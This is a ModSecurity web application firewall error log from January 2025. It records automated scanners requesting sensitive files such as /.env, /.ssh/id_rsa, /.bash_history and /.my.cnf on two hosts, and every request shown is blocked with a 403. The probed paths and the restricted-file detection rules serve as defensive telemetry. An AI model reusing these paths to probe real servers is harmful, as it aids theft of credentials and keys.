[Fri Jan 24 14:34:14.104839 2025] [:error] [pid 675849] [client 185.246.189.156:36042] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2-installer.conf"] [unique_id "Z5OW1oMsHaJVSDKq5FmxqgAAAAY"]
[Fri Jan 24 14:34:16.004041 2025] [:error] [pid 675788] [client 185.246.189.156:36044] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2-install.conf"] [unique_id "Z5OW2J5E363iIbX8_SP9wAAAAAM"]
[Fri Jan 24 14:34:16.005075 2025] [:error] [pid 675788] [client 185.246.189.156:36044] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2-install.conf"] [unique_id "Z5OW2J5E363iIbX8_SP9wAAAAAM"]
[Fri Jan 24 14:34:16.005530 2025] [:error] [pid 675788] [client 185.246.189.156:36044] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2-install.conf"] [unique_id "Z5OW2J5E363iIbX8_SP9wAAAAAM"]
[Sun Jan 26 16:01:22.302173 2025] [:error] [pid 718662] [client 137.184.19.56:34252] [client 137.184.19.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5ZOQkYXxbt1J-uEAHvQVQAAAAQ"]
[Sun Jan 26 16:01:22.304215 2025] [:error] [pid 718662] [client 137.184.19.56:34252] [client 137.184.19.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5ZOQkYXxbt1J-uEAHvQVQAAAAQ"]
[Sun Jan 26 16:01:22.304678 2025] [:error] [pid 718662] [client 137.184.19.56:34252] [client 137.184.19.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5ZOQkYXxbt1J-uEAHvQVQAAAAQ"]
[Tue Jan 28 00:18:39.012823 2025] [:error] [pid 758873] [client 45.148.10.172:39438] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5gUT5gGekFVMOQ-ozEwXgAAAAI"]
[Tue Jan 28 00:18:39.014527 2025] [:error] [pid 758873] [client 45.148.10.172:39438] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5gUT5gGekFVMOQ-ozEwXgAAAAI"]
[Tue Jan 28 00:18:39.015001 2025] [:error] [pid 758873] [client 45.148.10.172:39438] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5gUT5gGekFVMOQ-ozEwXgAAAAI"]
[Tue Jan 28 18:14:27.536721 2025] [:error] [pid 761321] [client 13.38.136.255:55024] [client 13.38.136.255] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5kQcx51T9ZS-dFMN0RBzAAAAAU"]
[Tue Jan 28 18:14:27.537184 2025] [:error] [pid 761321] [client 13.38.136.255:55024] [client 13.38.136.255] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5kQcx51T9ZS-dFMN0RBzAAAAAU"]
[Tue Jan 28 18:14:27.537629 2025] [:error] [pid 761321] [client 13.38.136.255:55024] [client 13.38.136.255] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5kQcx51T9ZS-dFMN0RBzAAAAAU"]
[Wed Jan 29 01:42:53.559845 2025] [:error] [pid 778950] [client 185.246.189.156:35636] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "Z5l5jasGWWz8jbvsuU2a1AAAAAE"]
[Wed Jan 29 01:42:53.560594 2025] [:error] [pid 778950] [client 185.246.189.156:35636] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "Z5l5jasGWWz8jbvsuU2a1AAAAAE"]
[Wed Jan 29 01:42:53.561145 2025] [:error] [pid 778950] [client 185.246.189.156:35636] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "Z5l5jasGWWz8jbvsuU2a1AAAAAE"]
[Wed Jan 29 01:42:55.430713 2025] [:error] [pid 778953] [client 185.246.189.156:35648] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "Z5l5j6KGKRAgIiGrQO8wOgAAAAU"]
[Wed Jan 29 01:42:55.431326 2025] [:error] [pid 778953] [client 185.246.189.156:35648] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "Z5l5j6KGKRAgIiGrQO8wOgAAAAU"]
[Wed Jan 29 01:42:55.431825 2025] [:error] [pid 778953] [client 185.246.189.156:35648] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "Z5l5j6KGKRAgIiGrQO8wOgAAAAU"]
[Wed Jan 29 01:42:56.669492 2025] [:error] [pid 779023] [client 185.246.189.156:35660] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".bash_history" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .bash_history found within REQUEST_FILENAME: /.bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "Z5l5kOsTvB69BXjnMsGiEAAAAAM"]
[Wed Jan 29 01:42:56.670096 2025] [:error] [pid 779023] [client 185.246.189.156:35660] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "Z5l5kOsTvB69BXjnMsGiEAAAAAM"]
[Wed Jan 29 01:42:56.670655 2025] [:error] [pid 779023] [client 185.246.189.156:35660] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "Z5l5kOsTvB69BXjnMsGiEAAAAAM"]
[Wed Jan 29 01:43:14.746667 2025] [:error] [pid 778949] [client 185.246.189.156:36100] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "Z5l5osiZdor_OysQUzXbUgAAAAA"]
[Wed Jan 29 01:43:14.747347 2025] [:error] [pid 778949] [client 185.246.189.156:36100] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "Z5l5osiZdor_OysQUzXbUgAAAAA"]
[Wed Jan 29 01:43:14.747998 2025] [:error] [pid 778949] [client 185.246.189.156:36100] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "Z5l5osiZdor_OysQUzXbUgAAAAA"]
[Wed Jan 29 01:43:16.099956 2025] [:error] [pid 781617] [client 185.246.189.156:36112] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".ssh/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/config found within REQUEST_FILENAME: /.ssh/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "Z5l5pDw07IGIWnwPlP02oAAAAAY"]
[Wed Jan 29 01:43:16.100544 2025] [:error] [pid 781617] [client 185.246.189.156:36112] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "Z5l5pDw07IGIWnwPlP02oAAAAAY"]
[Wed Jan 29 01:43:16.101034 2025] [:error] [pid 781617] [client 185.246.189.156:36112] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "Z5l5pDw07IGIWnwPlP02oAAAAAY"]
[Wed Jan 29 01:43:19.708561 2025] [:error] [pid 778952] [client 185.246.189.156:36150] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "Z5l5p9r_c6BIPFKcefKRxAAAAAQ"]
[Wed Jan 29 01:43:19.709650 2025] [:error] [pid 778952] [client 185.246.189.156:36150] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "Z5l5p9r_c6BIPFKcefKRxAAAAAQ"]
[Wed Jan 29 01:43:19.710122 2025] [:error] [pid 778952] [client 185.246.189.156:36150] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "Z5l5p9r_c6BIPFKcefKRxAAAAAQ"]
[Wed Jan 29 01:43:21.039900 2025] [:error] [pid 778950] [client 185.246.189.156:49834] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "Z5l5qasGWWz8jbvsuU2a2AAAAAE"]
[Wed Jan 29 01:43:21.040832 2025] [:error] [pid 778950] [client 185.246.189.156:49834] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "Z5l5qasGWWz8jbvsuU2a2AAAAAE"]
[Wed Jan 29 01:43:21.041302 2025] [:error] [pid 778950] [client 185.246.189.156:49834] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "Z5l5qasGWWz8jbvsuU2a2AAAAAE"]
[Wed Jan 29 01:43:22.263677 2025] [:error] [pid 778951] [client 185.246.189.156:49848] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "Z5l5qo9_4nHO5WEzWUnzugAAAAI"]
[Wed Jan 29 01:43:22.264250 2025] [:error] [pid 778951] [client 185.246.189.156:49848] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "Z5l5qo9_4nHO5WEzWUnzugAAAAI"]
[Wed Jan 29 01:43:22.264451 2025] [:error] [pid 778951] [client 185.246.189.156:49848] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "Z5l5qo9_4nHO5WEzWUnzugAAAAI"]
[Wed Jan 29 01:43:23.607332 2025] [:error] [pid 778949] [client 185.246.189.156:49860] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".my.cnf" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .my.cnf found within REQUEST_FILENAME: /.my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "Z5l5q8iZdor_OysQUzXbUwAAAAA"]
